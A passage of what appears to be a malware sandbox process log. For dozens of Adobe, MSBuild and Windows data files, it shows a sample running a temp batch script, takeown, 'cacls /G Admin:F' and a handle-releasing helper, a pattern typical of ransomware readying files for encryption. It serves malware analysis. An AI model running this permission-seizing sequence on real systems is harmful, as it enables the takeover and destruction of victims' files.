C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "server_lg.gif" -nobanner3⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:1368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:1240
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "usa.fca" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "usa.fca" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:568
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "brt.fca" -nobanner3⤵PID:280
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "brt.fca" -nobanner4⤵PID:1956
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:1224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "can129.hsp" -nobanner3⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "can129.hsp" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "usa37.hyp" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "usa37.hyp" -nobanner4⤵PID:524
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:1968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:984
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:1896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵
- Modifies file permissions
PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1956
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1244
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:700
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "directories.acrodata" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "directories.acrodata" -nobanner4⤵PID:592
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "directories.acrodata" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "directories.acrodata" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "device.png" -nobanner3⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "device.png" -nobanner4⤵PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "background.png" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "background.png" -nobanner4⤵PID:360
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "overlay.png" -nobanner3⤵PID:980
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "overlay.png" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "superbar.png" -nobanner3⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "superbar.png" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:280
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:1292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵
- Modifies file permissions
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1840
-
-
-
